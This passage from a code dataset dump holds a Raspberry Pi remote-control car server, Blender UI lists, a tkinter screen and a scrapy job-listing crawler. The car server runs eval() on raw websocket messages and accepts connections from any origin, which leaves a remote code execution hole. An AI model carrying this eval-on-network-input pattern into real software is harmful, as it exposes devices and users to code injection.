the first line, fill the set\n if newgroup:\n newgroup = False\n for c in current:\n s.add(c)\n else:\n for c in current:\n t.add(c)\n s.intersection_update(t)\n t.clear()\n answer += len(s)\n return answer\n\n\nprint(part2()) ","sub_path":"Python/problem6.py","file_name":"problem6.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"605483623","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport threading\nimport time\nimport json\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\nimport tornado.httpserver\nimport psutil\nimport subprocess\nimport logging\nimport argparse\nimport RPi.GPIO as GPIO\nfrom datetime import datetime, timedelta\nfrom tornado.options import define, options, parse_command_line\nfrom multiprocessing import Process\nfrom pygame import mixer\n\nmixer.init()\nshot = mixer.Sound('sounds/shot.wav')\n\n# For working with SPI protocol, Analogue sensors and battery level\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\nSPI_PORT = 0\nSPI_DEVICE = 0\ntry:\n mcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\nexcept:\n mcp = None\nbat_max = 792\nbat_min = 150\nbat_channel = 4 # MCP3008 channels\n\n\n# For working with i2c protocol\nimport Adafruit_PCA9685\npwm = Adafruit_PCA9685.PCA9685()\npwm.set_pwm_freq(60)\n\nchannels = {\n 'steering': 0, \n 'accelerate': 1, \n 'camera': 2,\n\n 'low_beam': 4, \n 'high_beam': 5, \n 'left_signal': 6, \n 'right_signal': 7, \n\n 'stop_signal': 8, \n 'rear_signal': 9, \n\n 'machinegun1': 12,\n 'machinegun2': 13,\n}\n\nled_pulse = 4095\n\nparser = argparse.ArgumentParser(description='Parameters for avacar device.')\nparser.add_argument('--url', help='URL for tornado to listen on')\nparser.add_argument('--avacar_type', help='Avacar type (drift, touring etc.)')\nparser.add_argument('--session_id', help='Uniq session id')\nparser.add_argument('--accelerate_coeff', help='Acceleration coeff')\nparser.add_argument('--steering_coeff', help='Steering coeff')\nparser.add_argument('--battery_voltage', help='Battery voltage for measuring the current charge level')\nparser.add_argument('--wheel_radius', help='Wheel radius for correct speed measuring')\nparser.add_argument('--accelerate_idle', type=int, help='Default position for accelerate')\nparser.add_argument('--accelerate_start', type=int, help='Pulse from which starts to accelerate')\nparser.add_argument('--accelerate_max', type=int, help='Max pulse')\nparser.add_argument('--accelerate_nitro', type=int, help='Pulse with nitro enabled')\nparser.add_argument('--backwards_start', type=int, help='Pulse from which starts moving backwards')\nparser.add_argument('--backwards_max', type=int, help='Max backwards pulse')\nparser.add_argument('--steering_idle', type=int, help='Default pulse for steering')\nparser.add_argument('--steering_max', type=int, help='Max pulse for steering')\nparser.add_argument('--nitro_level', type=float, help='Max pulse for steering')\nparser.add_argument('--min_lap_time', type=float, help='Minimum possible lap time on the location')\nparser.add_argument('--total_laps', type=int, help='Total race laps to go. Disconnects after finishing')\nparser.add_argument('--machinegun_rounds', type=int, help='Machinegun rounds given for race')\n\nparser.add_argument('--user_acceleration', type=float, help='User custom parameter')\nparser.add_argument('--user_max_speed', type=float, help='User custom parameter')\nparser.add_argument('--user_steering', type=float, help='User custom parameter')\nparser.add_argument('--user_braking', type=float, help='User custom parameter')\nparser.add_argument('--power_boost', type=float, help='Increase acceleration by this parameter')\nparser.add_argument('--speed_boost', type=float, help='Increase max speed by this parameter')\n\n\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='/var/log/avacar.log',\n # filemode='w'\n )\n\nargs = parser.parse_args()\nlogging.info(args)\n\n# Set outputs to default position\npwm.set_pwm(channels['accelerate'], 0, args.accelerate_idle)\npwm.set_pwm(channels['steering'], 0, args.steering_idle)\npwm.set_pwm(channels['camera'], 0, 375)\n\nos.system(\"amixer set 'PCM' 90%\") # Make 90% volume to analogue out\n\n\nclass avacar():\n def __init__(self):\n self.proc_start_time = datetime.now()\n self.connected_time = None\n self.last_activity_time = datetime.now()\n self.no_activity = False\n self.last_session_update = datetime.now()\n self.last_message_ts = datetime.now()\n\n # User custom control parameters\n try:\n self.user_acceleration = args.user_acceleration\n except:\n self.user_acceleration = 1\n try:\n self.user_max_speed = args.user_max_speed\n except:\n self.user_max_speed = 1\n try:\n self.user_steering = args.user_steering\n except:\n self.user_steering = 1\n try:\n self.user_braking = args.user_braking\n except:\n self.user_braking = 1\n\n try:\n self.power_boost = 1 + args.power_boost\n except:\n self.power_boost = 1\n try:\n self.speed_boost = 1 + args.speed_boost\n except:\n self.speed_boost = 1\n\n\n self.wheel_connected = False\n self.drive = True\n self.rear_drive = False\n self.rpm = 0\n self.rpm_idx = 0\n self.gear = 1\n self.power = 0 # In fact it`s motor power from 0 to 1\n\n self.last_engine_stroke = datetime.now() # Last engine stroke sound\n\n self.acceleration = 0\n if args.accelerate_coeff:\n self.accelerate_coeff = float(args.accelerate_coeff)\n else:\n self.accelerate_coeff = 1\n self.steering = 0\n self.steering_step = 0.01\n if args.steering_coeff:\n self.steering_coeff = float(args.steering_coeff)\n else:\n self.steering_coeff = 1\n self.session_log = ''\n\n # These values are valid with 60Hz frequency\n self.pulse_accelerate = 370\n self.nitro = False\n self.nitro_level = args.nitro_level\n self.pulse_steering = 375\n self.key_up = False\n self.key_down = False\n self.key_left = False\n self.key_right = False\n self.brake_last_ts = datetime.now()\n\n # Measuring real speed\n self.last_hall_pulse = None\n self.distance = 0\n self.start_time = None\n self.speed = 0\n self.speed_max = 0\n self.speed_avg = 0\n # self.wheel_radius = 0.03\n if args.wheel_radius:\n self.wheel_radius = float(args.wheel_radius)*0.01\n else:\n self.wheel_radius = 0\n\n # Laps\n self.line_crossed_last = datetime.now()\n self.line_crossed = False\n self.total_acceleration = 200\n self.total_steering = 50\n\n self.laps_count = -1\n self.laps_count_last = -1\n self.min_lap_time = args.min_lap_time\n self.start_race_time = None\n self.start_lap_time = None\n self.last_lap_time = None\n self.best_lap_time = None\n if args.total_laps:\n self.total_laps = args.total_laps\n else:\n self.total_laps = None\n self.finished = False\n self.race_time = None\n\n # Lights and signals\n self.low_beam = False\n self.low_beam_last = datetime.now()\n self.high_beam = False\n self.high_beam_last = datetime.now()\n self.turn_right_signal = False\n self.turn_right_signal_last = datetime.now()\n self.left_blink = False\n self.turn_left_signal = False\n self.turn_left_signal_last = datetime.now()\n self.right_blink = False\n self.danger_signal = False\n self.danger_signal_last = datetime.now()\n\n # Shooting\n self.shooting = False\n self.last_shot_ts = None\n self.machinegun_rounds = args.machinegun_rounds\n\n # Individual cars characteristics\n # self.speed_max = 150\n self.gearshift_delay = 0.3 # sec\n self.rpm_ratio = 250 # how fast it increases rpm\n self.gear_ratio = {1: 4, 2: 2, 3: 1.5, 4: 1, 5: 0.8, 6: 0.7 }\n \n self.gear_speed_max = {1: 44, 2: 88, 3: 116, 4: 175, 5: 218, 6: 250 }\n self.accelerate_last = 0\n self.max_power = {}\n # for i in range(1,7):\n # self.max_power[i] = self.gear_speed_max[i]/self.speed_max\n # print(self.max_power)\n self.braking_coeff = 10 # how good it brakes\n\n # Camera orientation\n self.camera_x = 0\n self.camera_y = 0\n\n\ndef engine_sound():\n # logging.info('Play engine sound')\n os.system('play sounds/engine_stroke.wav speed %s' % (1+avacar.acceleration))\n\n\ndef hallSensor(channel):\n if not GPIO.input(GPIO_map['hall_sensor']):\n if not avacar.last_hall_pulse:\n avacar.last_hall_pulse = datetime.now()\n else:\n if (datetime.now() - avacar.last_hall_pulse).microseconds > 25000:\n distance = 2*avacar.wheel_radius*3.14\n avacar.distance += distance\n if avacar.start_time:\n avacar.speed_avg = round(avacar.distance/(datetime.now() - avacar.start_time).seconds, 2)\n else:\n avacar.start_time = datetime.now()\n avacar.speed = (distance / (datetime.now() - avacar.last_hall_pulse).microseconds)*1000000 # 2*pi*radius / time\n avacar.speed_max = max(avacar.speed_max, avacar.speed)\n avacar.last_hall_pulse = datetime.now()\n\n\ndef reflectSensor(channel):\n # if GPIO.input(GPIO_map['reflect_sensor']):\n\n if GPIO.input(GPIO_map['light_sensor']):\n pass \n else:\n logging.info('Line crossed')\n if (datetime.now() - avacar.line_crossed_last).total_seconds() > 5 and avacar.total_acceleration >= 200 and avacar.total_steering >= 50: # 250 is statistically got number of acceleration\n avacar.line_crossed = True\n avacar.line_crossed_last = datetime.now()\n logging.info(avacar.total_acceleration)\n logging.info(avacar.total_steering)\n avacar.total_acceleration = 0\n avacar.total_steering = 0\n\n\ndef run_avacar():\n while True:\n # Kill process if no one connected during 30 seconds\n if (datetime.now() - avacar.proc_start_time).total_seconds() > 30 and not avacar.connected_time:\n # logging.error('No one connected to the device, exiting..')\n # os.system('killall -9 raspivid gst-launch-1.0 avacar.py')\n kill_process()\n sys.exit()\n # Kill process if no activity after 5 minutes\n # logging.info((datetime.now() - avacar.last_activity_time).total_seconds())\n if avacar.last_activity_time and (datetime.now() - avacar.last_activity_time).total_seconds() > 300:\n logging.error('Not active more than 1 minute, exiting..')\n kill_process()\n time.sleep(0.1)\n\n\ndef kill_process():\n logging.info('Killing process...')\n pwm.set_pwm(channels['accelerate'], 0, args.accelerate_idle)\n pwm.set_pwm(channels['steering'], 0, args.steering_idle)\n # os.system('killall -9 raspivid gst-launch-1.0')\n os.system('pkill -f -9 raspivid')\n os.system('pkill -f -9 gst-launch-1.0')\n os.system('pkill -f -9 avacar')\n # sys.exit()\n\n\ndef run_engine():\n ''' Play engine sound '''\n # if (datetime.now() - avacar.last_engine_stroke).microseconds > 50000*(1.5-avacar.acceleration):\n while True:\n # engine_sound_thread = threading.Thread(name='engine_sound', target=engine_sound)\n # engine_sound_thread.daemon = True\n # engine_sound_thread.start()\n\n engine_sound_proc = Process(target=engine_sound)\n engine_sound_proc.start()\n # engine_sound_proc.join()\n\n time.sleep(0.16*(1.5-avacar.acceleration))\n\n\ndef run_weapons():\n while True:\n if avacar.shooting:\n if not avacar.last_shot_ts:\n avacar.last_shot_ts = datetime.now()\n elif avacar.last_shot_ts and (datetime.now() - avacar.last_shot_ts).total_seconds() >= 0.1 and avacar.machinegun_rounds > 0:\n avacar.last_shot_ts = datetime.now()\n shot.stop()\n shot.play()\n pwm.set_pwm(channels['machinegun1'], 0, led_pulse)\n pwm.set_pwm(channels['machinegun2'], 0, led_pulse)\n avacar.machinegun_rounds -= 1\n logging.info('Rounds left: ' + str(avacar.machinegun_rounds))\n time.sleep(0.05)\n pwm.set_pwm(channels['machinegun1'], 0, 0)\n pwm.set_pwm(channels['machinegun2'], 0, 0)\n\n\nclass WebSocketHandler(tornado.websocket.WebSocketHandler):\n\n def check_origin(self, origin):\n return True\n\n def open(self, *args):\n logging.info('Client connected')\n # self.stream.set_nodelay(True)\n # self.loop = tornado.ioloop.PeriodicCallback(self.monitor_parameters, 5000, io_loop=tornado.ioloop.IOLoop.instance())\n self.loop = tornado.ioloop.PeriodicCallback(self.monitor_parameters, 5000)\n self.loop.start()\n avacar.connected_time = datetime.now()\n\n def on_message(self, message):\n \"\"\" Actions on receiving keypresses from WEB, return parameters to js \"\"\"\n self.handle_controls(message)\n avacar_dict = str(avacar.__dict__.copy())\n\n def monitor_parameters(self):\n link_quality, signal_level = self.get_wifi_signal()\n battery_level = self.get_battery_level()\n temperature = self.get_temp()\n self.write_message(json.dumps({'link_quality': link_quality, 'signal_level': signal_level.replace('Noise',''), 'battery_level': battery_level, 'temperature': temperature}))\n\n def handle_controls(self, message):\n keys_dict = eval(message)\n pulse_accelerate = None\n # print(datetime.now(), keys_dict)\n # logging.info(keys_dict)\n\n avacar.last_message_ts = datetime.now()\n ts_start = datetime.now()\n message = {}\n\n if 'start' in keys_dict:\n if not avacar.start_time:\n avacar.start_time = datetime.now()\n avacar.session_log = 'logs/%s.log' % keys_dict['session_id']\n\n # For changing configuration parameters online\n if 'user_acceleration' in keys_dict:\n logging.info(keys_dict)\n avacar.user_acceleration = keys_dict['user_acceleration']\n if 'user_max_speed' in keys_dict:\n logging.info(keys_dict)\n avacar.user_max_speed = keys_dict['user_max_speed']\n if 'user_steering' in keys_dict:\n logging.info(keys_dict)\n avacar.user_steering = keys_dict['user_steering']\n if 'user_braking' in keys_dict:\n logging.info(keys_dict)\n avacar.user_braking = keys_dict['user_braking']\n\n keys_list = []\n for key, val in keys_dict.items():\n try:\n if eval(val):\n keys_list.append(key)\n except:\n pass\n\n if 'gamepad' in keys_dict:\n accelerate = keys_dict['accelerate']\n if -1 <= accelerate < 0:\n keys_list.append('38')\n elif 0 < accelerate <= 1:\n keys_list.append('40')\n accelerate = abs(accelerate)\n\n steering = keys_dict['steering']\n if -1 <= steering < 0:\n keys_list.append('37')\n elif 0 < steering <= 1:\n keys_list.append('39')\n else:\n accelerate = 1\n steering = 1\n\n if '38' in keys_list: # Up\n if avacar.rear_drive:\n avacar.rear_drive = False\n if args.avacar_type == 'Drift':\n avacar.acceleration = 1\n if avacar.rpm < 1:\n avacar.rpm += 0.3*avacar.user_acceleration*avacar.power_boost*accelerate\n else:\n if avacar.acceleration < 0.05:\n avacar.acceleration = 0.2\n elif avacar.acceleration >= 0.03 and avacar.acceleration < 1:\n avacar.acceleration += 0.04*avacar.user_acceleration*accelerate\n if avacar.rpm < 1:\n avacar.rpm += 0.1*avacar.user_acceleration*avacar.power_boost*accelerate\n avacar.last_activity_time = datetime.now()\n else:\n if avacar.rpm > 0:\n avacar.rpm -= 0.1\n if avacar.acceleration > 0.03 and args.avacar_type != 'Drift':\n avacar.acceleration -= 0.01\n else:\n avacar.acceleration = 0\n avacar.nitro = False\n\n\n if '40' in keys_list: # Down\n avacar.last_activity_time = datetime.now()\n if avacar.acceleration > 0:\n avacar.acceleration -= 0.3*avacar.user_braking*accelerate\n avacar.brake_last_ts = datetime.now()\n pwm.set_pwm(channels['stop_signal'], 0, 4000)\n elif avacar.acceleration <= 0 and not avacar.rear_drive:\n avacar.acceleration = 0\n avacar.rear_drive = True\n avacar.brake_last_ts = datetime.now()\n pwm.set_pwm(channels['stop_signal'], 0, 4000)\n if avacar.rear_drive and (datetime.now() - avacar.brake_last_ts).total_seconds() > 0.5 and avacar.acceleration > -1:\n avacar.acceleration -= 0.3*accelerate\n # avacar.acceleration = -0.5*avacar.user_max_speed*accelerate\n pwm.set_pwm(channels['rear_signal'], 0, 4000)\n # logging.info(avacar.acceleration)\n else:\n pwm.set_pwm(channels['stop_signal'], 0, 0)\n pwm.set_pwm(channels['rear_signal'], 0, 0)\n\n if avacar.nitro:\n pulse_accelerate = round(args.accelerate_start + args.accelerate_nitro*avacar.user_max_speed*avacar.speed_boost)\n else:\n if avacar.acceleration > 0:\n pulse_accelerate = round(args.accelerate_start + avacar.acceleration*args.accelerate_max*avacar.user_max_speed*avacar.speed_boost)\n elif avacar.acceleration == 0:\n pulse_accelerate = args.accelerate_idle\n elif avacar.acceleration < 0:\n # logging.info(avacar.acceleration)\n pulse_accelerate = round(args.backwards_start + avacar.acceleration*args.backwards_max*avacar.user_max_speed*avacar.speed_boost)\n\n if pulse_accelerate:\n # logging.info(pulse_accelerate)\n pwm.set_pwm(channels['accelerate'], 0, pulse_accelerate)\n\n try:\n if '38' not in keys_list and '40' not in keys_list:\n pwm.set_pwm(channels['accelerate'], 0, args.accelerate_idle)\n avacar.nitro = False\n except:\n pass\n\n # if '16' in keys_dict and eval(keys_dict['16']): # Nitro!!\n # if avacar.nitro_level > 0:\n # avacar.nitro = True # Max acceleration\n # avacar.nitro_level -= 0.01\n # else:\n # avacar.nitro = False\n # else:\n # avacar.nitro = False\n\n if '37' in keys_list: # left\n avacar.last_activity_time = datetime.now()\n if not avacar.key_left:\n avacar.key_left = True\n avacar.steering = -0.1*avacar.user_steering\n else:\n if 'gamepad' in keys_dict and -1 <= steering < 0:\n avacar.steering = steering\n else:\n if avacar.steering > -1:\n avacar.steering -= 0.1*avacar.steering_coeff*(2 if avacar.nitro else 1)*avacar.user_steering\n avacar.total_steering += abs(avacar.steering)\n\n pulse_steering = round(args.steering_idle - args.steering_max*avacar.steering)\n # pwm.set_pwm(channels['steering'], 0, pulse_steering)\n message['steering'] = avacar.steering\n\n if '39' in keys_list: # right\n avacar.last_activity_time = datetime.now()\n if not avacar.key_right:\n avacar.key_right = True\n avacar.steering = 0.1*avacar.user_steering\n else:\n if 'gamepad' in keys_dict and 0 < steering < 1:\n avacar.steering = steering\n else:\n if avacar.steering < 1:\n avacar.steering += 0.1*avacar.steering_coeff*(2 if avacar.nitro else 1)*avacar.user_steering\n avacar.total_steering += abs(avacar.steering)\n\n pulse_steering = round(args.steering_idle - args.steering_max*avacar.steering)\n # pwm.set_pwm(channels['steering'], 0, pulse_steering)\n message['steering'] = avacar.steering\n\n try:\n if '39' not in keys_list and '37' not in keys_list:\n avacar.key_left = False\n avacar.key_right = False\n avacar.steering = 0\n pulse_steering = args.steering_idle\n message['steering'] = 0\n except:\n pass\n\n pwm.set_pwm(channels['steering'], 0, pulse_steering)\n\n # Turn camera\n if '65' in keys_list: # Turn left\n pwm.set_pwm(channels['camera'], 0, 500)\n message['hide_dashboard'] = True\n elif '68' in keys_list: # Turn right\n pwm.set_pwm(channels['camera'], 0, 250)\n message['hide_dashboard'] = True\n else:\n pwm.set_pwm(channels['camera'], 0, 375)\n \n\n if avacar.last_hall_pulse and (datetime.now() - avacar.last_hall_pulse).microseconds > 250000:\n avacar.speed = 0\n\n # Count total acceleration sum (required for determining cheaters)\n avacar.total_acceleration += avacar.acceleration\n # logging.info(avacar.total_acceleration)\n\n # Send message back to web\n message['rpm'] = avacar.rpm\n message['speed'] = avacar.speed\n message['nitro_level'] = avacar.nitro_level\n message['distance'] = round(avacar.distance, 2)\n message['speed_max'] = round(avacar.speed_max*3.6, 2)\n message['speed_avg'] = round(avacar.speed_avg*3.6, 2)\n\n if avacar.last_activity_time and (datetime.now() - avacar.last_activity_time).total_seconds() > 50 and not avacar.no_activity:\n no_activity = True\n message['no activity'] = True\n else:\n no_activity = False\n\n if (datetime.now() - avacar.last_session_update).total_seconds() > 5:\n message['session_update'] = True\n message['session_id'] = args.session_id\n avacar.last_session_update = datetime.now()\n\n if avacar.line_crossed:\n message['session_update'] = True\n message['session_id'] = args.session_id\n message['line_crossed'] = True\n avacar.line_crossed = False\n avacar.last_session_update = datetime.now()\n\n # logging.info((datetime.now() - ts_start).microseconds)\n # logging.info(avacar.total_steering)\n\n try:\n self.write_message(json.dumps(message))\n except Exception as e:\n logging.error(str(e))\n\n def on_close(self):\n logging.info('Client disconnected, exiting.')\n # with open(avacar.session_log, 'a') as fileH: \n # fileH.write(',' + str(datetime.now()))\n # pwm = Adafruit_PCA9685.PCA9685() # Reset all outputs on PCA9685\n kill_process()\n # os.system('killall -9 raspivid gst-launch-1.0')\n # sys.exit()\n\n def get_wifi_signal(self):\n output = subprocess.Popen('iwconfig', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n for line in str(output.stdout.read()).split('\\\\n'):\n if 'Link Quality' in line:\n try:\n curr, max = line.split()[1].split('=')[1].split('/')\n # link_quality = round((int(curr)/float(max))*100, 2) # Percents\n link_quality = round(int(curr)/float(max), 3)\n signal_level = line.split('=')[2].strip()\n logging.info(link_quality, signal_level)\n return link_quality, signal_level\n except:\n return\n\n def get_temp(self):\n try:\n output = subprocess.Popen(['/opt/vc/bin/vcgencmd', 'measure_temp'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n temperature =str(output.stdout.read()).split('=')[1].split(\"'\")[0]\n logging.info(temperature)\n except:\n temperature = ''\n return temperature\n\n def get_battery_level(self):\n ''' Get battery levels '''\n values = [0]*8\n if mcp:\n for i in range(8):\n values[i] = mcp.read_adc(i)\n # logging.info(values)\n digital_level = values[bat_channel]\n battery_level = int((digital_level - bat_min)*100/(bat_max - bat_min))\n if battery_level < 0:\n battery_level = 0\n elif battery_level > 100:\n battery_level = 100\n return battery_level\n else:\n return 0\n\n\n\nif __name__ == '__main__':\n logging.info('Starting process')\n avacar = avacar()\n\n run_avacar_thread = threading.Thread(name='run_avacar', target=run_avacar)\n run_avacar_thread.daemon = True\n run_avacar_thread.start()\n\n # run_engine_thread = threading.Thread(name='run_engine', target=run_engine)\n # run_engine_thread.daemon = True\n # run_engine_thread.start()\n\n # run_weapons_thread = threading.Thread(name='run_weapons', target=run_weapons)\n # run_weapons_thread.daemon = True\n # run_weapons_thread.start()\n\n # Select GPIO numbers, not pin numbers. Set functional of GPIO contacts.\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO_map = {\n 'light_sensor': 18,\n 'hall_sensor': 23,\n 'reflect_sensor': 24,\n }\n\n GPIO.setup(GPIO_map['hall_sensor'], GPIO.IN)\n GPIO.add_event_detect(GPIO_map['hall_sensor'], GPIO.BOTH, callback=hallSensor)\n\n GPIO.setup(GPIO_map['light_sensor'], GPIO.IN)\n GPIO.add_event_detect(GPIO_map['light_sensor'], GPIO.BOTH, callback=reflectSensor)\n\n app = tornado.web.Application([(r'/'+args.session_id, WebSocketHandler),])\n\n app.listen(443, ssl_options = {\"certfile\": \"/etc/ssl/avacar.club/avacar.key\", \"keyfile\": \"/etc/ssl/avacar.club/private.key\",}) # SSL mode\n tornado.ioloop.IOLoop.instance().start()\n\n","sub_path":"avacar.py","file_name":"avacar.py","file_ext":"py","file_size_in_byte":26303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"79386878","text":"import bpy\nimport os\nfrom . icons import get_icon_id, get_img_icon_id\n\n\nclass ObDataItems(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n row = layout.row()\n if item.data_type == 0:\n row.label(item.ob.name, icon='VIEW3D')\n if item.used:\n used_text = 'Deselect All'\n else:\n used_text = 'Select All'\n row = row.row()\n row.alignment = 'RIGHT'\n row.operator('smc.combine_switch', text=used_text, emboss=False).list_id = index\n elif item.data_type == 1:\n row.separator()\n row = row.row(align=True)\n row.label(text='', icon_value=item.mat.preview.icon_id)\n row.prop(item.mat, 'name', text='')\n if item.used:\n used_icon = 'FILE_TICK'\n else:\n used_icon = 'LAYER_USED'\n row.operator('smc.combine_switch', text='', icon=used_icon).list_id = index\n\n def invoke(self, context, event):\n pass\n\n\nclass ImageItems(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n row = layout.row()\n if item.img_type == 0:\n item_img_icon = get_icon_id('texture')\n elif item.img_type == 2:\n item_img_icon = get_icon_id('diffuse')\n else:\n if os.path.isfile(item.img_path):\n item_img_icon = get_img_icon_id(item.img_name, item.img_path)\n else:\n item_img_icon = get_icon_id('image_broken')\n split = row.split(percentage=0.08)\n split.label(str(index))\n split = split.split(percentage=0.797)\n split.prop(item, 'img_name', text='', emboss=False, icon_value=item_img_icon)\n split = split.split(align=True)\n if item.img_type == 1:\n split.prop(item, 'img_color', text='')\n split.operator('smc.img_reset', text='', icon_value=get_icon_id('clear')).list_id = index\n elif item.img_type == 2:\n split.prop(item, 'img_color', text='')\n split.operator('smc.img_reset', text='', icon_value=get_icon_id('clear')).list_id = index\n else:\n split.operator('smc.img_color', text='', icon_value=get_icon_id('diffuse')).list_id = index\n split.operator('smc.img_path', text='', icon_value=get_icon_id('image_search')).list_id = index\n\n def invoke(self, context, event):\n pass\n\n def filter_items(self, context, data, propname):\n col = getattr(data, propname)\n filter_name = self.filter_name.lower()\n flt_flags = [\n self.bitflag_filter_item if any(\n filter_name in filter_set for filter_set in (str(i), item.img_name.lower(), item.img_path.lower()))\n else 0 for i, item in enumerate(col, 1)]\n\n if self.use_filter_sort_alpha:\n flt_neworder = [x[1] for x in sorted(\n zip([x[0] for x in sorted(enumerate(col), key=lambda x: x[1].img_name)],\n range(len(col))))]\n else:\n flt_neworder = []\n return flt_flags, flt_neworder\n","sub_path":"All_In_One/addons/material-combiner-addon/extend_lists.py","file_name":"extend_lists.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"345334860","text":"from tkinter import *\r\nfrom typing import Set\r\n\r\nclass Screen:\r\n def __init__(self, root:Tk, frame:Frame, canvas:Canvas, screens:tuple):\r\n self.root = root\r\n self.frame = frame\r\n self.canvas = canvas\r\n self.screens = screens\r\n \r\n self.root.update()\r\n self.height = self.root.winfo_height()\r\n self.width = self.root.winfo_width()\r\n \r\n self.canvas.create_line(0, self.height/10, self.width, self.height/10)\r\n \r\n def changeScreen(self, screen:str):\r\n if screen not in self.screens :\r\n raise KeyError(\"This screen does not exist.\")\r\n ","sub_path":"blankPage.py","file_name":"blankPage.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"396650067","text":"\"\"\"\n Crawler for VictoriaGov based on ATSSpider\n scrapy crawl victoriagov -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://careers.vic.gov.au/vacancies\"\n Sample Job URL:\n http://careers.vic.gov.au/vacancies\n\"\"\"\n\nfrom math import ceil\nfrom scrapy.http import FormRequest, Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, Prefix, MapJobField, MapJobTypes\n\n\nclass VictoriaGov(ATSSpider):\n\n name = 'victoriagov'\n handle_httpstatus_list = [100]\n\n def parse(self, response):\n \"\"\"\n Made POST request call and pass required post parameters.\n \"\"\"\n sel = Selector(response)\n list_url = sel.xpath(\n '//div[@class=\"sideBar\"]/div[@class=\"jobSearch\"]/form/@action'\n ).extract()\n if list_url:\n yield FormRequest(\n callback=self.parse_jobs_list,\n formdata={\n 'in_organid': \"\".join(\n sel.xpath('//form//input[@name=\"in_organid\"]/@value').extract()\n ),\n 'in_position': '',\n 'in_searchBut': 'Go',\n },\n headers={\n 'Connection': 'close',\n },\n url=list_url[0],\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(text=response.body)\n for tr in sel.xpath('//table[@id=\"JobSearchResults\"]/tbody/tr'):\n joburl = tr.xpath('.//a[2]/@href').extract()\n if joburl:\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, joburl[0])\n )\n\n total_results = int(\n \"\".join(\n sel.xpath('//p[@class=\"search_results_txt\"]/b/text()').extract()\n ).split(' ')[0]\n )\n if total_results > 20:\n total_pages = int(ceil(int(total_results) / 20.0))\n previous_page = 40\n current_page = 0\n for page in xrange(2, total_pages + 1):\n current_page += 20\n yield FormRequest(\n callback=self.parse_pages,\n formdata={\n 'in_graphic': '',\n 'in_industry': '',\n 'in_jobDate': 'All',\n 'in_jobType': '',\n 'in_jobreference': '',\n 'in_jobsites': '',\n 'in_location': '',\n 'in_multi01': '',\n 'in_multi01_id': '',\n 'in_multi02': '',\n 'in_multi02_id': '',\n 'in_multi03': '',\n 'in_multi03_id': '',\n 'in_multi04': '',\n 'in_multi04_id': '',\n 'in_multi05': '',\n 'in_multi05_id': '',\n 'in_multi06': '',\n 'in_multi06_id': '',\n 'in_nav': 'next_set',\n 'in_navigation1': '',\n 'in_orderby': '',\n 'in_organid': '14123',\n 'in_param': '',\n 'in_param1': '',\n 'in_param2': '',\n 'in_param3': '',\n 'in_param4': '',\n 'in_param5': '',\n 'in_pg': str(current_page),\n 'in_position': '',\n 'in_prevpg': str((current_page - previous_page)),\n 'in_recruiter': '',\n 'in_residency': '',\n 'in_salrange': '',\n 'in_selectTally': '',\n 'in_sessionid': '',\n 'in_skills': '',\n 'in_summary': 'S',\n 'in_totalrows': str(total_results),\n 'in_version': '',\n },\n headers={\n 'Connection': 'close',\n },\n url=urljoin(response.url, 'jncustomsearch.searchAction'),\n )\n\n def parse_pages(self, response):\n sel = Selector(text=response.body)\n for tr in sel.xpath('//table[@id=\"JobSearchResults\"]/tbody/tr'):\n job_url = tr.xpath('./td/a[2]/@href').extract()\n if job_url:\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, job_url[0])\n )\n\n def parse_job(self, response):\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"rasp_job_container\"]/div[@id=\"rasp_job_content\"]/div[@class=\"column_L\"]/h2[@class=\"job_title\"]/text() | '\n '//h2[@class=\"job_title\"]/text()|//td[@id=\"dkshade\"]/text()'\n )\n loader.add_xpath(\n 'referencenumber',\n [\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Reference:\")]/following-sibling::td/text()',\n '//td[strong[contains(text(), \"Reference:\")]]/following-sibling::td/text()'\n ],\n Prefix('victoriagov-')\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'company',\n '//tr/td[contains(text(), \"Department:\")]/following-sibling::td[1]/text()'\n )\n loader.add_xpath(\n 'location',\n [\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Work Location:\")]/following-sibling::td/text()',\n '//td[strong[contains(text(), \"Work Location:\")]]/following-sibling::td/text()'\n ]\n )\n loader.add_xpath(\n 'description',\n ['//div[@id=\"rasp_job_descr\"]', \"//table[@id='tbl_search_2']\"]\n )\n loader.add_xpath(\n 'jobcategory',\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Job Function:\")]/following-sibling::td/text()'\n )\n loader.add_xpath(\n 'jobtype',\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Work Type:\")]/following-sibling::td/text()',\n MapJobField(['Ongoing', 'Fixed term', 'Casual'], 